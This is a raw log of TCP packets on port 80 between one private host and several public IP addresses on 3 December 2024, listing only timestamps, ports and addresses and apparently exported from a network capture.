                                                                                                  Dec 3, 2024 09:50:51.172900915 CET804991684.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:51.173113108 CET4991680192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:51.178272963 CET4991680192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:51.178325891 CET4991680192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:51.390207052 CET804991684.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:51.390314102 CET804991684.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:51.390321970 CET804991684.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:53.699057102 CET4991780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:53.910542011 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:53.910763979 CET4991780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:53.914057016 CET4991780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:54.125540972 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:54.125713110 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:54.125828028 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:54.125838041 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:54.125941992 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:54.125952005 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:54.125960112 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:54.126111984 CET4991780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:54.126111984 CET4991780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:54.126202106 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:54.126368046 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:54.126661062 CET4991780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:54.127583981 CET4991780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:54.339170933 CET804991784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:59.606843948 CET4991880192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:50:59.818008900 CET8049918185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:50:59.818130016 CET4991880192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:50:59.823410988 CET4991880192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:00.034684896 CET8049918185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:00.174305916 CET8049918185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:00.174319029 CET8049918185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:00.174335003 CET8049918185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:00.174484968 CET8049918185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:00.174487114 CET4991880192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:00.174494982 CET8049918185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:00.174608946 CET4991880192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:01.335535049 CET4991880192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:02.352174997 CET4991980192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:02.563332081 CET8049919185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:02.563496113 CET4991980192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:02.569658041 CET4991980192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:02.780761957 CET8049919185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:02.915153980 CET8049919185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:02.915256977 CET8049919185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:02.915271044 CET8049919185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:02.915374041 CET8049919185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:02.915385962 CET8049919185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:02.915524006 CET4991980192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:02.915524006 CET4991980192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:04.084971905 CET4991980192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:05.101785898 CET4992080192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:05.312884092 CET8049920185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:05.313034058 CET4992080192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:05.317981005 CET4992080192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:05.318000078 CET4992080192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:05.529124022 CET8049920185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:05.529239893 CET8049920185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:05.529249907 CET8049920185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:05.648806095 CET8049920185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:05.648819923 CET8049920185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:05.648910046 CET8049920185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:05.648920059 CET8049920185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:05.648929119 CET8049920185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:05.649131060 CET4992080192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:05.649298906 CET4992080192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:06.834562063 CET4992080192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:07.851212025 CET4992180192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:08.062238932 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.062385082 CET4992180192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:08.066049099 CET4992180192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:08.277057886 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.410832882 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.410864115 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.410880089 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.410913944 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.410931110 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.410947084 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.410970926 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.410989046 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.411026955 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.411046982 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.411111116 CET4992180192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:08.411204100 CET4992180192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:08.411318064 CET4992180192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:08.622250080 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.622272968 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.622313976 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.622334003 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:08.622701883 CET4992180192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:08.622879028 CET4992180192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:08.623871088 CET4992180192.168.11.30185.68.16.160
                                                                                                  Dec 3, 2024 09:51:08.834894896 CET8049921185.68.16.160192.168.11.30
                                                                                                  Dec 3, 2024 09:51:13.886318922 CET4992280192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:14.093914986 CET8049922185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:14.094126940 CET4992280192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:14.100228071 CET4992280192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:14.307822943 CET8049922185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:14.307923079 CET8049922185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:14.307931900 CET8049922185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:14.308134079 CET4992280192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:15.613681078 CET4992280192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:16.631117105 CET4992380192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:16.832691908 CET8049923185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:16.832870007 CET4992380192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:16.837585926 CET4992380192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:17.039261103 CET8049923185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:17.039356947 CET8049923185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:17.039366961 CET8049923185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:17.039573908 CET4992380192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:18.347424984 CET4992380192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:19.363728046 CET4992480192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:19.566720963 CET8049924185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:19.566972017 CET4992480192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:19.572068930 CET4992480192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:19.572122097 CET4992480192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:19.773842096 CET8049924185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:19.773857117 CET8049924185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:19.773884058 CET8049924185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:19.773895979 CET8049924185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:19.774130106 CET4992480192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:21.081424952 CET4992480192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:22.097799063 CET4992580192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:22.303561926 CET8049925185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:22.303756952 CET4992580192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:22.307570934 CET4992580192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:22.513200998 CET8049925185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:22.513396025 CET8049925185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:22.513552904 CET8049925185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:22.513562918 CET8049925185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:22.513654947 CET8049925185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:22.513664961 CET8049925185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:22.513791084 CET4992580192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:22.514133930 CET4992580192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:22.515531063 CET4992580192.168.11.30185.134.245.113
                                                                                                  Dec 3, 2024 09:51:22.721051931 CET8049925185.134.245.113192.168.11.30
                                                                                                  Dec 3, 2024 09:51:30.582413912 CET4992680192.168.11.3074.208.236.156
                                                                                                  Dec 3, 2024 09:51:30.712461948 CET804992674.208.236.156192.168.11.30
                                                                                                  Dec 3, 2024 09:51:30.712636948 CET4992680192.168.11.3074.208.236.156
                                                                                                  Dec 3, 2024 09:51:30.715660095 CET4992680192.168.11.3074.208.236.156
                                                                                                  Dec 3, 2024 09:51:30.845551014 CET804992674.208.236.156192.168.11.30
                                                                                                  Dec 3, 2024 09:51:30.851119995 CET804992674.208.236.156192.168.11.30
                                                                                                  Dec 3, 2024 09:51:30.851480961 CET804992674.208.236.156192.168.11.30
                                                                                                  Dec 3, 2024 09:51:30.851730108 CET4992680192.168.11.3074.208.236.156
                                                                                                  Dec 3, 2024 09:51:30.852391005 CET4992680192.168.11.3074.208.236.156
                                                                                                  Dec 3, 2024 09:51:30.982218981 CET804992674.208.236.156192.168.11.30
                                                                                                  Dec 3, 2024 09:51:35.860402107 CET4992780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:36.071899891 CET804992784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:36.072097063 CET4992780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:36.076575041 CET4992780192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:36.287962914 CET804992784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:36.288465023 CET804992784.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:38.609929085 CET4992880192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:38.822695971 CET804992884.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:38.822882891 CET4992880192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:38.827339888 CET4992880192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:39.039549112 CET804992884.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:39.039592028 CET804992884.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:41.358580112 CET4992980192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:41.570416927 CET804992984.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:41.570584059 CET4992980192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:41.575098038 CET4992980192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:41.575150013 CET4992980192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:41.787182093 CET804992984.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:41.787225008 CET804992984.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.092989922 CET4993180192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:44.304276943 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.304508924 CET4993180192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:44.308553934 CET4993180192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:44.520565033 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.524399042 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.524517059 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.524537086 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.524554014 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.524569035 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.524584055 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.524599075 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.524641991 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:44.524792910 CET4993180192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:44.524840117 CET4993180192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:44.526199102 CET4993180192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:51:44.737642050 CET804993184.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:51:49.529066086 CET4993280192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:49.641254902 CET804993213.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:49.641458035 CET4993280192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:49.646483898 CET4993280192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:49.756624937 CET804993213.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:49.756983042 CET804993213.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:49.757153988 CET4993280192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:51.152604103 CET4993280192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:51.262481928 CET804993213.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:52.168915987 CET4993380192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:52.278191090 CET804993313.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:52.278419018 CET4993380192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:52.284377098 CET4993380192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:52.395045996 CET804993313.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:52.396955967 CET804993313.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:52.397074938 CET4993380192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:53.792485952 CET4993380192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:53.901597977 CET804993313.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:54.809010983 CET4993580192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:54.920490026 CET804993513.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:54.920698881 CET4993580192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:54.928535938 CET4993580192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:54.928617001 CET4993580192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:55.038606882 CET804993513.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:55.038716078 CET804993513.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:55.038731098 CET804993513.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:55.038959026 CET804993513.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:57.448947906 CET4993680192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:57.559082031 CET804993613.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:57.559315920 CET4993680192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:57.562145948 CET4993680192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:57.671111107 CET804993613.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:57.672314882 CET804993613.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:57.672360897 CET804993613.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:51:57.672727108 CET4993680192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:57.673870087 CET4993680192.168.11.3013.248.169.48
                                                                                                  Dec 3, 2024 09:51:57.782686949 CET804993613.248.169.48192.168.11.30
                                                                                                  Dec 3, 2024 09:52:02.682271004 CET4993780192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:02.849404097 CET804993766.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:02.849544048 CET4993780192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:02.855634928 CET4993780192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:03.022624969 CET804993766.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:03.034406900 CET804993766.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:03.034423113 CET804993766.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:03.034569979 CET4993780192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:04.368843079 CET4993780192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:05.384912014 CET4993880192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:05.552265882 CET804993866.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:05.552438021 CET4993880192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:05.557306051 CET4993880192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:05.724570036 CET804993866.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:05.738183022 CET804993866.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:05.738215923 CET804993866.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:05.738399029 CET4993880192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:07.070640087 CET4993880192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:08.087291956 CET4993980192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:08.254278898 CET804993966.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:08.254494905 CET4993980192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:08.260241985 CET4993980192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:08.260291100 CET4993980192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:08.426299095 CET804993966.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:08.426340103 CET804993966.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:08.457756042 CET804993966.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:08.457802057 CET804993966.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:08.457901955 CET4993980192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:09.773154974 CET4993980192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:10.789894104 CET4994080192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:10.960071087 CET804994066.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:10.960309029 CET4994080192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:10.963670969 CET4994080192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:11.133719921 CET804994066.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:11.145595074 CET804994066.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:11.145638943 CET804994066.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:11.145884991 CET4994080192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:11.146691084 CET4994080192.168.11.3066.29.149.46
                                                                                                  Dec 3, 2024 09:52:11.316507101 CET804994066.29.149.46192.168.11.30
                                                                                                  Dec 3, 2024 09:52:16.163980007 CET4994180192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:16.272306919 CET80499413.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:16.272481918 CET4994180192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:16.277427912 CET4994180192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:16.385829926 CET80499413.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:16.388370991 CET80499413.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:16.388524055 CET4994180192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:17.786902905 CET4994180192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:17.895179987 CET80499413.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:18.803457975 CET4994280192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:19.816909075 CET4994280192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:21.832124949 CET4994280192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:21.942398071 CET80499423.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:21.942589998 CET4994280192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:21.947321892 CET4994280192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:22.057436943 CET80499423.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:22.057754993 CET80499423.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:22.057931900 CET4994280192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:23.457595110 CET4994280192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:23.567162037 CET80499423.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:24.474191904 CET4994380192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:24.582191944 CET80499433.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:24.582452059 CET4994380192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:24.586952925 CET4994380192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:24.586996078 CET4994380192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:24.695143938 CET80499433.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:24.695188046 CET80499433.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:24.695219040 CET80499433.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:24.696901083 CET80499433.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:24.697063923 CET4994380192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:26.097845078 CET4994380192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:26.205884933 CET80499433.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:27.114120960 CET4994480192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:27.224975109 CET80499443.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:27.225162029 CET4994480192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:27.228329897 CET4994480192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:27.337541103 CET80499443.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:27.340080976 CET80499443.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:27.340126991 CET80499443.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:27.340347052 CET4994480192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:27.341085911 CET4994480192.168.11.303.33.130.190
                                                                                                  Dec 3, 2024 09:52:27.450297117 CET80499443.33.130.190192.168.11.30
                                                                                                  Dec 3, 2024 09:52:32.348125935 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:32.686254025 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:32.686486006 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:32.692522049 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.030656099 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.032449961 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.032509089 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.032552958 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.032596111 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.032639027 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.032680988 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.032713890 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.032711983 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.032757044 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.032804012 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.032840967 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.032896042 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.032989979 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.035000086 CET8049945129.226.153.85192.168.11.30
                                                                                                  Dec 3, 2024 09:52:33.035235882 CET4994580192.168.11.30129.226.153.85
                                                                                                  Dec 3, 2024 09:52:33.370893002 CET8049945129.226.153.85192.168.11.30
